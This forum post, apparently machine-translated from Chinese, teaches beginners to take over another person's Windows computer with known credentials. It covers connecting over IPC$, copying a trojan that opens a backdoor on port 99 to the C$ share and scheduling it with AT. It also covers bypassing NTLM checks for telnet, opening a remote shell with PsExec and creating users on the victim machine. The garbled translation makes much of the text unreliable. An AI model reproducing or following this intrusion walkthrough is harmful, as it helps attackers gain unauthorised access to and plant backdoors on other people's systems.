Why establish IPC $ enhance the permissions of Guest, mention the authority of the guest on my own machine? "I have seen a lot of post in the forum. I feel that I should say something. If you are interested in learning, you will finish reading the following methods. If you think a method is not learning, you will advise you. Don't fantasize again! Use the user to establish an IPC connection, and if you have successful, you can't create superusers directly on your computer, because Net user / add must be running locally, that is, you have to think about telnet, or Using other methods to jump into the other party's CMD to create users. How can users open the other party's CMD? Prerequisite: You already have users and passwords. Methods, because the previous has successfully established IPC connections, so we can copy commands Transmit Trojans, such as uploading srv.exe, copy srv.exe // ip / c $, then view the other party with NET Time // ip, then use the AT // IP srv.exe 06:10 command to Run srv.exe, don't tell me that SRV is the Trojan who opened 99 ports?! If SRV is not being killed by anti-virus software Kill, you can enter Telnet IP 99 in the CMD to log in to the other party CMD. Then You can establish a user in the other party CMD. Like local DOS operation, you can open the other party's Telnet service with Netsvc.exe tools, but even if Telnet is opened, it is necessary to verify the other party NTLM. Verify that the common method is that NTLM.exe in the upper conversation, and then runs with AT, you can directly Telnet IP without verifying. Further, you can also create a password that you use to make IPC connections to you locally. With the same user as the username, then restart to log in with this user, you can directly Telnet how the method is the easiest and most easier and most effective way. If you have a resistance to see it, you will explain my efforts. There is no white feet. The reason why this way is not written in front, because the rookie can try more other methods, understand "the road to the computer is not only one!" The truth. First download a set of PSTools online Toolkit, PSTools is a system management tool for WinNT / Win2000. There is twelve commands in the rectack, which is very powerful. Here we have to use psexec.exe, if you don't say it, you don't say it. Go to see, use the format as the following PSExec.exe // ip -u username -P password cmd.exe can open the other party CMD directly, and no NTLM verification. Below is the download address of PSTools, http: // Download .pchome.net / system / sysenhance / 16488.html Because Srv.e XE and NTLM.EXE were identified by a lot of anti-virus software as a virus, and most of them will be killed. So the success rate is not high. The third method is the most real, I believe it is also the most ways after reading this article. I hope you can accept it. I also recommend that you will try the two methods in front. If you try, you will have a harvest. The above method is to learn from the predecessor online, and some little experience is also But I would like to see this article to make you improve the understanding of the other CMD.